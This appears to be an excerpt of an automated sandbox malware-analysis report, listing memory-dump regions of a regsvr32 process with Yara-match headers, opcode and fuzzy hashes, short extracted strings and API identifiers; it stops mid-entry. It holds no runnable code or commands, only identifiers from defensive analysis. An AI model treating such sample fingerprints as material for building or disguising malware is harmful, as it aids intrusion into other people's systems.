                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (3
                                                                                                                                                • API String ID: 0-2570504824
                                                                                                                                                • Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                                                • Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
                                                                                                                                                • Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                                                • Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: [r\^
                                                                                                                                                • API String ID: 0-4041245994
                                                                                                                                                • Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                                                • Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
                                                                                                                                                • Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                                                • Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #X
                                                                                                                                                • API String ID: 0-1684620495
                                                                                                                                                • Opcode ID: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                                                                                                • Instruction ID: c074d48008b4f0de6335b08329d09b3dcf7b4425e670a70b5eb694557c772c54
                                                                                                                                                • Opcode Fuzzy Hash: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                                                                                                • Instruction Fuzzy Hash: CD31C27050074A8BCF48DF68C48A5DE7FA1BB68388F204619F85A96250D3B896A9CBC4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: [[x
                                                                                                                                                • API String ID: 0-2553898450
                                                                                                                                                • Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                                                • Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
                                                                                                                                                • Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                                                • Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: g\&
                                                                                                                                                • API String ID: 0-1994035986
                                                                                                                                                • Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                                                                                                • Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
                                                                                                                                                • Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                                                                                                • Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #X
                                                                                                                                                • API String ID: 0-1684620495
                                                                                                                                                • Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                                                • Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
                                                                                                                                                • Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                                                • Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: GfMu
                                                                                                                                                • API String ID: 0-241548529
                                                                                                                                                • Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                                                • Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
                                                                                                                                                • Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                                                • Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: k|
                                                                                                                                                • API String ID: 0-998972391
                                                                                                                                                • Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                                                • Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
                                                                                                                                                • Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                                                • Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: wz_
                                                                                                                                                • API String ID: 0-2163964638
                                                                                                                                                • Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                                                • Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
                                                                                                                                                • Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                                                • Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: {?Q
                                                                                                                                                • API String ID: 0-927583641
                                                                                                                                                • Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                                                • Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
                                                                                                                                                • Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                                                • Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: |}6\
                                                                                                                                                • API String ID: 0-3074799505
                                                                                                                                                • Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                                                • Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
                                                                                                                                                • Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                                                • Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 3&a
                                                                                                                                                • API String ID: 0-537350193
                                                                                                                                                • Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                                                • Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
                                                                                                                                                • Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                                                • Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: o0:X
                                                                                                                                                • API String ID: 0-645126758
                                                                                                                                                • Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                                                • Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
                                                                                                                                                • Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                                                • Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: D4}
                                                                                                                                                • API String ID: 0-491520632
                                                                                                                                                • Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                                                                                                • Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
                                                                                                                                                • Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                                                                                                • Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1583075380-0
                                                                                                                                                • Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                                                • Instruction ID: ad47b573d9151c600ab11274eede75c78c80d7bf853c907d14b5861c2f5930b5
                                                                                                                                                • Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                                                • Instruction Fuzzy Hash: 92A1A262B1C695C2DB649F2696697AFA762FF84BC8F448535DE4D1BB49CE3CE001C320
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                                                • Instruction ID: fcaa2a63b6f973e30e7fb6b12d48ad43b4cb073385fdeeb6c34344bef8894b7f
                                                                                                                                                • Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                                                • Instruction Fuzzy Hash: 1E71F672F1C15ACBD31CDB19D8656786796FBE4308F588835D60E8AB94EE39F940C720
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                                                • Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
                                                                                                                                                • Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                                                • Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                                                                                                • Instruction ID: b4cc55b2ba55f7836136ac8b5ed3643aad821ec95d31101853fef74eb9d9cec8
                                                                                                                                                • Opcode Fuzzy Hash: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                                                                                                • Instruction Fuzzy Hash: FF51787090470DABDBA9CF64C4893EEBBF0FB48354F60806DE85697390DB749A85CB81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                                                • Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
                                                                                                                                                • Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                                                • Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                                                • Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
                                                                                                                                                • Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                                                • Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                                                                                                • Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
                                                                                                                                                • Opcode Fuzzy Hash: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                                                                                                • Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                                                • Instruction ID: dbb4fad0742d9b29c59b9a64f17438fc1cba9462e735a4e3b2d00d7b8da19945
                                                                                                                                                • Opcode Fuzzy Hash: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                                                • Instruction Fuzzy Hash: 4C5192B490038E8FCB48CF69C84A5DE7BB1FB48358F104A19FC26A6250D7B4D665CF94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                                                • Instruction ID: 08efbb833ea687ad733901112953304226336fcfa3581264405f9509991f6ff4
                                                                                                                                                • Opcode Fuzzy Hash: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                                                • Instruction Fuzzy Hash: 6551BEB490074A8BCB48CF68D4875DE7FB0FB68398F20421DEC56AA250D3B496A5CFD4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                                                • Instruction ID: 52c1f8436ada09c5d91cc0f6a0e49c089501cc81ef075f7e28a52ff611ebfcf9
                                                                                                                                                • Opcode Fuzzy Hash: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                                                • Instruction Fuzzy Hash: D351B3B190438E8FCB48DF68D98A5DE7BB0FB48348F104A19FC26A6250D3B4D664CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                                                • Instruction ID: 871f118089c9e262c63038bd4f0fd9666d89e9c6fa6f13266ea976bdce614408
                                                                                                                                                • Opcode Fuzzy Hash: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                                                • Instruction Fuzzy Hash: CB41393190071DABDB95CFA4C8892EEBBF1FF44358F608159E852A7384DBB49685CF81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                                                • Instruction ID: 72cb41ac5f9990f9c197b8bd4b5430fc958a2c545255f7632808fe9bc15cd904
                                                                                                                                                • Opcode Fuzzy Hash: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                                                • Instruction Fuzzy Hash: A141D27090034A8BCB48DF68D8865DE7FB0FB58388F20461DE81AA6350D3B896A5CBD5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
